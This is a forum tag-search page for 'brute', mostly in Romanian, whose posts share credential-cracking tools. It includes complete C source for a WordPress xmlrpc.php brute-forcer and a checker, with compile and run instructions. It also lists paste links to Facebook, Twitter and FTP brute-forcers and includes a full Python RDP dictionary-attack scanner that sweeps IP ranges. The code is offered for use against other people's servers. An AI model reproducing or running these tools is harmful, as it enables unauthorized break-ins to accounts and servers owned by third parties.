Search the Community
Showing results for tags 'brute'.
-
standard description. On the HTTP proxy works fine. // link removed
-
Salut , vreau si eu un scanner (brute ) pt vncuri - contra cost nu degeaba ceva cum era inainte nvnc , mentionez ca vubrute nu imi merge tocami ok...) Multumesc frumos !
-
Am tot vazut brute-uri pentru Wordpress, dar majoritatea pe wp-login.php, asa ca am decis sa fac unul pentru xmlrpc.php. ===== brute.c ===== #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <stdio.h> #include <errno.h> #include <fcntl.h> #include <netdb.h> #include <arpa/inet.h> #include <sys/wait.h> #include <unistd.h> #define RED "\E[32;31m" #define GREEN "\E[32;40m" #define NORMAL "\E[m" void usage(char *s); int getvuln(char *victim, char *user, char *pass, FILE *outfile, char *link); FILE *ipfile, *userfile, *passfile, *outfile, *badfile; int numforks = 0; void usage(char *s) { printf(RED"ELITE WP BruteF0rce"); printf(GREEN"\n"GREEN); printf("Smoke w33d everyday;)\n"NORMAL); printf("Usage: %s <ips file> <userfile> <passfile> <threads>\n", s); exit(EXIT_SUCCESS); } int getvuln(char *victim, char *user, char *pass, FILE *outfile, char *link) { int sockfd, n, rc, valopt; struct sockaddr_in serv_addr; struct hostent *server; struct timeval timeout, tread; size_t ulen, plen; long arg; fd_set myset; socklen_t lon; struct hostent *hl = gethostbyname(victim); if(!hl) exit(0); long ipadd; memset(&ipadd, 0, sizeof(ipadd)); memcpy(&ipadd, hl->h_addr, hl->h_length); timeout.tv_sec = 4; timeout.tv_usec = 0; tread.tv_sec = 10; tread.tv_usec = 0; char buffer[2048], postvar[1024], clen[256]; sockfd = socket(AF_INET, SOCK_STREAM, 0); arg = fcntl(sockfd, F_GETFL, NULL); arg |= O_NONBLOCK; fcntl(sockfd, F_SETFL, arg); if (sockfd < 0) { perror("ERROR opening socket"); exit(1); } if (setsockopt (sockfd, SOL_SOCKET, SO_RCVTIMEO, (char *)&tread, sizeof(tread)) < 0) error("setsockopt failed\n"); if (setsockopt (sockfd, SOL_SOCKET, SO_SNDTIMEO, (char *)&tread, sizeof(tread)) < 0) error("setsockopt failed\n"); bzero(&serv_addr,sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr=ipadd; serv_addr.sin_port=htons(80); if (connect(sockfd,(struct sockaddr *)&serv_addr,sizeof(serv_addr)) < 0) { if (errno == EINPROGRESS) { FD_ZERO(&myset); FD_SET(sockfd, &myset); if (select(sockfd+1, NULL, &myset, NULL, &timeout) > 0) { lon = sizeof(int); getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon); if (valopt) { exit(0); } } else { exit(0); } } else { exit(0); } } arg = fcntl(sockfd, F_GETFL, NULL); arg &= (~O_NONBLOCK); fcntl(sockfd, F_SETFL, arg); strcpy(postvar, "<?xml version=\"1.0\"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>"); strcat(postvar, "<string>admin</string></value></param><param><value><string>"); strcat(postvar, pass); strcat(postvar, "</string></value></param></params></methodCall>"); sprintf(clen, "%d", strlen(postvar)); bzero(buffer, 2048); strcpy(buffer, "POST "); strcat(buffer, link); strcat(buffer, " HTTP/1.1\r\n"); strcat(buffer, "Host: "); strcat(buffer, victim); strcat(buffer, "\r\nConnection: keep-alive\r\n"); strcat(buffer, "Content-Length: "); strcat(buffer, clen); strcat(buffer, "\r\nCache-Control: max-age=0\r\n"); strcat(buffer, "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8\r\n"); strcat(buffer, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"); strcat(buffer, "Content-Type: application/x-www-form-urlencoded\r\n"); strcat(buffer, "Accept-Language: en-US,en;q=0.8\r\n"); strcat(buffer, "Cookie: wordpress_test_cookie=WP+Cookie+check"); strcat(buffer, "\r\n\r\n"); strcat(buffer, postvar); strcat(buffer, "\r\n\r\n"); n = write(sockfd,buffer,strlen(buffer)); if (n < 0) { exit(1); } bzero(buffer,2048); n = read(sockfd,buffer,2047); if (n < 0) { exit(1); } if(strstr(buffer, "isAdmin")) { printf("[+]Found: %s%s - %s %s\n", victim, link, user, pass); outfile = fopen("wp.log", "a+"); fprintf(outfile, "%s%s - %s %s\n", victim, link, user, pass); fclose(outfile); } close(sockfd); return 0; } int main(int argc, char *argv[]) { char *ip, user[1024], invtmp[1024], pass[1024], *link, tok[1024], processed[512000]; processed[0]=0; time_t start; if (argc < 5) usage(argv[0]); printf("[*] List: %s Threads: %s FILE: %s\n", argv[1], argv[2], argv[3]); start = time(0); if(!(ipfile = fopen(argv[1], "r"))) { printf("INVALID DOMAINS FILE: %s\n", argv[1]); exit(0); } fclose(ipfile); if(!(userfile = fopen(argv[2], "r"))) { printf("INVALID USERS FILE: %s\n", argv[2]); exit(0); } fclose(userfile); if(!(passfile = fopen(argv[3], "r"))) { printf("INVALID PASSWORDS FILE: %s\n", argv[3]); exit(0); } fclose(passfile); if(!(badfile = fopen("error.tmp", "r"))) badfile = fopen("error.tmp", "a+"); fclose(badfile); if(!(badfile = fopen("wp.log", "r"))) badfile = fopen("wp.log", "a+"); fclose(badfile); userfile = fopen(argv[2], "r"); while(1) { if(!fgets((char *)&user, sizeof(user), userfile)) break; if (user[strlen (user) - 1] == '\n') user[strlen (user) - 1] = '\0'; if (user) { passfile = fopen(argv[3], "r"); while (1) { if(!fgets((char *)&pass, sizeof(pass), passfile)) break; if (pass[strlen (pass) - 1] == '\n') pass[strlen (pass) - 1] = '\0'; if (pass) { badfile = fopen("wp.log", "r"); strcpy(processed, ""); while (1) { if(!fgets((char *)&invtmp, sizeof(invtmp), badfile)) break; strcat(processed, invtmp); } fclose(badfile); ipfile = fopen(argv[1], "r"); while (1) { if(!fgets((char *)&tok, sizeof(tok), ipfile)) break; if (tok[strlen (tok) - 1] == '\n') tok[strlen (tok) - 1] = '\0'; if (tok) { char ip2[256], pass2[256]; ip = strtok(tok, " "); link = strtok(NULL, " "); strcpy(ip2, ip); strcpy(pass2, pass); if(strstr(pass2, "DOMAIN%")) { if(ip2[strlen(ip2)-5] == '.') ip2[strlen(ip2)-5] = '\0'; if(ip2[strlen(ip2)-4] == '.') ip2[strlen(ip2)-4] = '\0'; if(ip2[strlen(ip2)-3] == '.') ip2[strlen(ip2)-3] = '\0'; if(strstr(ip2, "www.")) { char tmp[128],tmpass[128]; int ivar,jvar=0; for(ivar=4;ivar<strlen(ip2);ivar++) { tmp[jvar] = ip2[ivar]; tmp[jvar+1] = '\0'; jvar++; } strcpy(tmpass, tmp); strcpy(tmp, ""); jvar=0; for(ivar=7;ivar<strlen(pass2);ivar++) { tmp[jvar] = pass2[ivar]; tmp[jvar+1] = '\0'; jvar++; } strcat(tmpass, tmp); strcpy(pass2, tmpass); } else { char tmp[128],tmpass[128]; int ivar,jvar=0; for(ivar=0;ivar<strlen(ip2);ivar++) { tmp[jvar] = ip2[ivar]; tmp[jvar+1] = '\0'; jvar++; } strcpy(tmpass, tmp); strcpy(tmp, ""); jvar=0; for(ivar=7;ivar<strlen(pass2);ivar++) { tmp[jvar] = pass2[ivar]; tmp[jvar+1] = '\0'; jvar++; } strcat(tmpass, tmp); strcpy(pass2, tmpass); } } if(!strstr(processed, ip)) { if(!(fork())) { getvuln(ip,user,pass2,outfile,link); exit(0); } else { numforks++; if (numforks > atoi(argv[4])) for (numforks; numforks > atoi(argv[4]); numforks--) wait(NULL); } } } } fclose(ipfile); } } fclose(passfile); } } fclose(userfile); printf("[*] Completed in: %lu secs\n", (time(0) - start)); exit(EXIT_SUCCESS); } ===== checker.c ===== #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <stdio.h> #include <errno.h> #include <fcntl.h> #include <netdb.h> #include <arpa/inet.h> #include <sys/mman.h> #include <sys/types.h> #include <sys/wait.h> #include <unistd.h> #define RED "\E[32;31m" #define GREEN "\E[32;40m" #define NORMAL "\E[m" void usage(char *s); int getvuln(char *victim, char *link, FILE *outfile); FILE *ipfile, *userfile, *passfile, *outfile, *badfile; int numforks = 0; void usage(char *s) { printf(RED"ELITE SMTP BruteF0rce"); printf(GREEN"\n"GREEN); printf("Smoke w33d everyday;)\n"NORMAL); printf("Usage: %s <IPs file> <threads>\n", s); exit(EXIT_SUCCESS); } int getvuln(char *victim, char *link, FILE *outfile) { int sockfd, n, rc, valopt; struct sockaddr_in serv_addr; struct hostent *server; struct timeval timeout, tread; size_t ulen, plen; long arg; fd_set myset; socklen_t lon; struct hostent *hl = gethostbyname(victim); if(!hl) exit(0); long ipadd; memset(&ipadd, 0, sizeof(ipadd)); memcpy(&ipadd, hl->h_addr, hl->h_length); timeout.tv_sec = 4; timeout.tv_usec = 0; tread.tv_sec = 10; tread.tv_usec = 0; char buffer[2048], postvar[2048], clen[256]; sockfd = socket(AF_INET, SOCK_STREAM, 0); arg = fcntl(sockfd, F_GETFL, NULL); arg |= O_NONBLOCK; fcntl(sockfd, F_SETFL, arg); if (sockfd < 0) { perror("ERROR opening socket"); exit(1); } if (setsockopt (sockfd, SOL_SOCKET, SO_RCVTIMEO, (char *)&tread, sizeof(tread)) < 0) error("setsockopt failed\n"); if (setsockopt (sockfd, SOL_SOCKET, SO_SNDTIMEO, (char *)&tread, sizeof(tread)) < 0) error("setsockopt failed\n"); bzero(&serv_addr,sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr=ipadd; serv_addr.sin_port=htons(80); if (connect(sockfd,(struct sockaddr *)&serv_addr,sizeof(serv_addr)) < 0) { if (errno == EINPROGRESS) { FD_ZERO(&myset); FD_SET(sockfd, &myset); if (select(sockfd+1, NULL, &myset, NULL, &timeout) > 0) { lon = sizeof(int); getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon); if (valopt) { exit(0); } } else { exit(0); } } else { exit(0); } } arg = fcntl(sockfd, F_GETFL, NULL); arg &= (~O_NONBLOCK); fcntl(sockfd, F_SETFL, arg); strcpy(postvar, "<?xml version=\"1.0\"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>"); strcat(postvar, "<string>admin</string></value></param><param><value><string>narecumsafie55"); strcat(postvar, "</string></value></param></params></methodCall>"); sprintf(clen, "%d", strlen(postvar)); bzero(buffer, 2048); strcpy(buffer, "POST "); strcat(buffer, link); strcat(buffer, " HTTP/1.1\r\n"); strcat(buffer, "Host: "); strcat(buffer, victim); strcat(buffer, "\r\nConnection: keep-alive\r\n"); strcat(buffer, "Content-Length: "); strcat(buffer, clen); strcat(buffer, "\r\nCache-Control: max-age=0\r\n"); strcat(buffer, "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8\r\n"); strcat(buffer, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"); strcat(buffer, "Content-Type: application/x-www-form-urlencoded\r\n"); strcat(buffer, "Accept-Language: en-US,en;q=0.8\r\n"); strcat(buffer, "Cookie: wordpress_test_cookie=WP+Cookie+check"); strcat(buffer, "\r\n\r\n"); strcat(buffer, postvar); strcat(buffer, "\r\n\r\n"); n = write(sockfd,buffer,strlen(buffer)); if (n < 0) { exit(1); } bzero(buffer,2048); n = read(sockfd, buffer, 2047); if (n < 0) { exit(1); } if(strstr(buffer, "<int>403</int>")) { printf("[+]Found: %s - %s\n", victim, link); fprintf(outfile, "%s %s\n", victim, link); } close(sockfd); return 0; } int main(int argc, char *argv[]) { char ip[1024]; time_t start; if (argc < 2) usage(argv[0]); outfile = fopen("out.log", "a+"); printf("[*] List: %s Threads: %s FILE: out.log\n", argv[1], argv[2]); start = time(0); if(!(ipfile = fopen(argv[1], "r"))) { printf("INVALID DOMAINS FILE: %s\n", argv[1]); exit(0); } while(1) { if(!fgets((char *)&ip, sizeof(ip), ipfile)) break; if (ip[strlen(ip)-1] == '\n') ip[strlen(ip)-1] = '\0'; if (ip) { if(!(fork())) { getvuln(ip,"/xmlrpc.php",outfile); exit(0); } else { numforks++; if (numforks > atoi(argv[2])) for (numforks; numforks > atoi(argv[2]); numforks--) wait(NULL); } if(!(fork())) { getvuln(ip,"/blog/xmlrpc.php",outfile); exit(0); } else { numforks++; if (numforks > atoi(argv[2])) for (numforks; numforks > atoi(argv[2]); numforks--) wait(NULL); } } } fclose(ipfile); printf("[*] Completed in: %lu secs\n", (time(0) - start)); exit(EXIT_SUCCESS); } Pentru compilare: gcc -o checker checker.c gcc -o brute brute.c Folositi checker pe o lista de domenii sau IPuri pentru a vedea care din acestea accepta autentificarea prin xmlrpc.php. Acesta va crea un fisier out.log. Usage: ./checker <IPs file> <threads> Pentru a incepe brute faceti o lista de useri, una de parole si porniti: ./brute out.log users.txt passwords.txt <threads> Threaduri am incercat pana la 1000 si merge ok, dar pentru siguranta folositi 300-400. Astept sugestii
-
[+] AnonGhost Auto SQLi Query Maker [+] https://ghostbin.com/paste/hd26gkco [+] Facebook XMPP Chat Protocol Bruteforce [+] https://ghostbin.com/paste/oynf9bt2 [+] Facebook Brute Reset Codel [+] https://ghostbin.com/paste/e5te5umj [+] Ftp Brute Force [+] https://ghostbin.com/paste/3sxovcuh/edit [+] Facebook Pentester [+] https://ghostbin.com/paste/qyns3ox7 [+] Twitter Brute Force [+] https://ghostbin.com/paste/nubyt3vh Password = ./d3f4ult_v1rUsa
-
Daca se dovedea a fi eficient la partea de crack il tineam privat, dar asa ii fac publica sursa, poate il imbunatateste cineva sau invata ceva din el. E mai mult un wrapper si se foloseste de rdesktop, dar in teorie ar trebui sa sparga ceva (am testat pe niste servere cunoscute plasate printre altele si cu niste liste de parole decente si uneori le prindea alteori sarea peste ele in aproape aceleasi conditii locale). Alte nelamuriri vedeti sursa. #! /usr/bin/env python # RDP Dictionary Attack # 21.05.2012 cmiN # # THIS SCRIPT IS INTENDED FOR PERSONAL AND LIMITED PURPOSES ONLY # I AM NOT RESPONSIBLE FOR ANY LEGAL OR ILLEGAL USE OF THIS PROGRAM # # Connect with rdesktop, xfreerdp or something similar using # servers, users and passwords from files. # After checking if the port is opened, the wrapper opens a shell console # executing the client with data from input files. In the meantime # a local socket is accepting connections from the target and if the link # is established then the user and password for that server are a match. # # You need rdesktop/xfreerdp (sudo apt-get/yum/equo install rdesktop/freerdp). # On gentoo based systems use emerge to find and install the newest packages. # Contact: cmin764@yahoo/gmail.com from sys import argv, platform from threading import Thread, active_count, Lock from subprocess import Popen from socket import * # defaults THRD = 4 # how many threads for crack phase TOUT = 6.0 # timeout in seconds # get global host ip try: sock = socket(AF_INET, SOCK_STREAM) sock.connect(("www.google.com", 80)) # assuming google works except error as excp: # error from socket (timed out or invalid server) print "Check your internet connection: %s." % excp exit() else: HOST = sock.getsockname()[0] finally: sock.close() del sock PORT = 51337 # used for local listening # attack modes RDP1 = ["rdesktop", "-u", "{user}", "-p", "{password}", "-s", "telnet {host} {port}", "-g", "1x1", "-a", "8", "-x", "m", "-z", "-m", "{server}"] RDP2 = ["xfreerdp", "-u", "{user}", "-p", "{password}", "-s", "telnet {host} {port}", "-g", "1x1", "-a", "8", "-x", "m", "-z", "--no-motion", "{server}"] VERB = False # verbose METH = "r" # RDP1 USER = ["Administrator"] SAFE = True SWTC = True LIMT = None # attacks (test only, None -> unlimited) class Engine: """Main class used to find and crack servers with desired options. For more info see usage from the bottom of the script. It executes commands through subprocess and waits for replies within timeout. """ def __init__(self, threads, timeout, host, port, rdp1, rdp2, verbose, method, usr, safe, switch): """Copy global options and prepare the core.""" self.cli = True # activate print/stdout (set to False if a GUI is used) self.threads = threads self.timeout = timeout self.host = host self.port = port self.rdp1 = rdp1 self.rdp2 = rdp2 self.verbose = verbose self.sockets = dict() # D[x] = True if x is available otherwise False self.pos = list() # list with indexes (user, password, server, telnet) self.usr = usr self.pwd = None self.srv = None # set the command used for scanning if method == "x": self.command = self.rdp2 else: self.command = self.rdp1 # default: don't save self.working = None self.cracked = None self.good = list() # rdp servers self.delete = set() # dispose of cracked servers self.lock = Lock() # global printing thread synchronization self.sock_mutex = Lock() # for localhost socket use if "linux" in platform: self.null = open("/dev/null", "w") else: self.null = open("NUL", "w") self.safe = safe self.switch = switch def __del__(self): """Destructor.""" if hasattr(self.srv, "close"): self.srv.close() if hasattr(self.usr, "close"): self.usr.close() if self.pwd: self.pwd.close() if self.working: self.working.close() if self.cracked: self.cracked.close() for sock in self.sockets: sock.shutdown(SHUT_RDWR) sock.close() def generator(self, src, dest): """Just like grandpa's old mileage meter :].""" temp = "%d.%d.%d.%d" byte = 256 yield temp % tuple(src) # yield -> the beauty of python while (src != dest): # like return but continue src[3] += 1 if src[3] == byte: src[3] = 0 src[2] += 1 if src[2] == byte: src[2] = 0 src[1] += 1 if src[1] == byte: src[1] = 0 src[0] += 1 yield temp % tuple(src) def set_threads(self, threads): self.threads = threads def set_safe(self, safe): self.safe = safe def set_switch(self, switch): self.switch = switch def set_timeout(self, timeout): self.timeout = timeout def set_verbose(self, verbose): self.verbose = verbose def set_method(self, method): if method == "x": self.command = self.rdp2 else: self.command = self.rdp1 def set_usr(self, usr): """If this is called, then the users are taken from a file.""" self.usr = open(usr, "r") # do not use the generic one def set_pwd(self, pwd): """The file with passwords is mandatory.""" self.pwd = open(pwd, "r") def set_srv(self, srv): """Make a file object or range generator from argument.""" if srv.find("-") == -1: # not found -> not range self.srv = open(srv, "r") else: chunks = srv.split("-") src, dest = chunks[0].split("."), chunks[1].split(".") for i in xrange(4): src[i] = int(src[i]) dest[i] = int(dest[i]) self.srv = self.generator(src, dest) def set_working(self, working): """Save progress in scan phase.""" self.working = open(working, "a") # safe append def set_cracked(self, cracked): """Save progress in crack phase.""" self.cracked = open(cracked, "a") def scan_server(self, server): """Check if the rdp port is opened on the specified server.""" try: # create the socket and connect sock = socket(AF_INET, SOCK_STREAM) sock.connect((server, 3389)) except error: # timed out in most cases if self.verbose: self.lock.acquire() if self.cli: print "[-] %s [NO]" % server # only with -v self.lock.release() else: # good news everyone self.lock.acquire() if self.cli: print "[+] %s [OK]" % server self.good.append(server) if self.working: self.working.write(server + "\n") self.working.flush() self.lock.release() finally: sock.close() def scan(self): """Just like a port scanner for 3389.""" setdefaulttimeout(self.timeout / 10.0) # 10% for server in self.srv: while active_count() > self.threads * 16: pass # do not exceed number of threads if self.switch: # scan them # now call the method in a separate thread Thread(target=self.scan_server, args=[server.strip()]).start() else: # or skip the scan self.good.append(server.strip()) while active_count() > 1: pass # join all def acquire_sock(self): for sock, state in self.sockets.iteritems(): if state: # available self.sockets[sock] = False # use it return sock def release_sock(self, sock): self.sockets[sock] = True def crack_server(self, command): try: # get a server self.sock_mutex.acquire() sock = self.acquire_sock() self.sock_mutex.release() command[self.pos[3]] = command[self.pos[3]].format(port=sock.getsockname()[1]) child = Popen(command, stdout=self.null, stderr=self.null) # no wait sock.accept() # here is the big overhead except error as excp: # timed out if self.verbose: self.lock.acquire() if self.cli: print "[-] %s %s %s [NO]" % (command[self.pos[2]], command[self.pos[0]], command[self.pos[1]]) self.lock.release() else: # good news again show = "%s %s %s" % (command[self.pos[2]], command[self.pos[0]], command[self.pos[1]]) self.delete.add(command[self.pos[2]]) # cracked! no need to process again self.lock.acquire() if self.cli: print "[+] " + show + " [OK]" if self.cracked: self.cracked.write(show + "\n") self.cracked.flush() self.lock.release() finally: child.kill() # do not close it, instead release it for further use self.release_sock(sock) # O(1) and can't affect the same socket def crack(self): """For each user take each password and test them with each working server.""" goodLen = len(self.good) if goodLen == 0: if self.cli: print "[!] No servers to crack." return if self.safe: # avoid deadlocks or strange behavior self.set_threads(min(self.threads, goodLen)) users = [line.strip() for line in self.usr] passwords = [line.strip() for line in self.pwd] if self.cli: print "[i] Cracking %d hosts in %fs." % (goodLen, float(len(users)) * len(passwords) * goodLen * self.timeout / self.threads) setdefaulttimeout(self.timeout) # now use the real timeout # prepare the sockets for port in xrange(self.threads): sock = socket(AF_INET, SOCK_STREAM) sock.settimeout(self.timeout) sock.bind((self.host, self.port + port)) sock.listen(1) self.sockets[sock] = True # init command template command = self.command shellIndex = command.index("telnet {host} {port}") command[shellIndex] = command[shellIndex].format(host=self.host, port="{port}") self.pos = [command.index("{user}"), command.index("{password}"), command.index("{server}"), shellIndex] attacks = 0 for user in users: command[self.pos[0]] = user for password in passwords: command[self.pos[1]] = password for server in self.good: command[self.pos[2]] = server while active_count() > self.threads: pass # do not exceed number of threads attacks += 1 if LIMT and attacks > LIMT: if self.cli: print "[!] Limit reached, buy the script." return # now call the method in a separate thread Thread(target=self.crack_server, args=[command[:]]).start() for server in self.delete: # N^2 can be reduced to NlogN with set self.good.remove(server) # and also to N with index memorization self.delete.clear() while active_count() > 1: pass # join all def parse(): at = 1 params = list() while at < argc: if argv[at] in ("-h", "--help"): print usage exit() # do not start the process elif argv[at] in ("-v", "--verbose"): app.set_verbose(True) elif argv[at] in ("-t", "--threads"): at += 1 app.set_threads(int(argv[at])) elif argv[at] in ("-T", "--timeout"): at += 1 app.set_timeout(float(argv[at])) elif argv[at] in ("-m", "--method"): at += 1 app.set_method(argv[at]) elif argv[at] in ("-w", "--working"): at += 1 app.set_working(argv[at]) elif argv[at] in ("-c", "--cracked"): at += 1 app.set_cracked(argv[at]) elif argv[at] in ("-s", "--safe-off"): app.set_safe(False) elif argv[at] in ("-n", "--no-scan"): app.set_switch(False) else: if argv[at][0] == "-": raise Exception("Invalid option") params.append(argv[at]) at += 1 pLen = len(params) if pLen not in (2, 3): raise Exception("Invalid number of parameters") app.set_srv(params[-1]) app.set_pwd(params[-2]) if pLen == 3: app.set_usr(params[-3]) # same index as 0 def main(): try: if argc == 1: # show a message or start the GUI which is missing print "You should run: %s --help" % argv[0] exit() # or parse the arguments parse() # and start the scanner print "[i] Scan phase started." app.scan() # filter the input for working rdp servers print "[i] Crack phase started." app.crack() # crack them except Exception as excp: print "[x] Error: %s." % excp except KeyboardInterrupt: print "[!] Stopped." else: print "[i] Finished." if __name__ == "__main__": argc = len(argv) usage = """ Usage: {0} [options] [usr] pwd srv Options: -t, --threads <number> number of threads (parallel connections) -s, --safe-off by default the number of threads is reduced to the number of working servers if it's greater use this option to keep the number of threads -T, --timeout <seconds> waiting response time for each connection -m, --method <r/x> use [r]desktop or [x]freerdp -w, --working <file> file used to store servers with 3389 opened -c, --cracked <file> file used to store cracked servers -n, --no-scan skip scan phase asumming all servers are working rdps -v, --verbose show extra information (default off) -h, --help show this help Parameters: usr users file (default users: {1}) pwd passwords file srv servers file or range (abc.def.ghi.jkl-mno.pqr.stu.vwx) Examples: {0} -c cracked.txt passwords.txt 68.195.205.60-68.195.211.60 {0} -w good.txt --timeout 2 -s pass.txt 91.202.91.119-91.202.94.15 {0} -t 256 -T 5 -v -c cracked.txt -n users.txt pass.txt good.txt Users, passwords and working servers are loaded into memory. Be aware to not open a file for both read and write. More exactly do not use the same file name with `-w`/`-c` and `srv`. THIS SCRIPT IS INTENDED FOR PERSONAL AND LIMITED PURPOSES ONLY I AM NOT RESPONSIBLE FOR ANY LEGAL OR ILLEGAL USE OF THIS PROGRAM Send bugs to cmin764@yahoo/gmail.com. """.format(argv[0], USER) app = Engine(THRD, TOUT, HOST, PORT, RDP1, RDP2, VERB, METH, USER, SAFE, SWTC) main() del app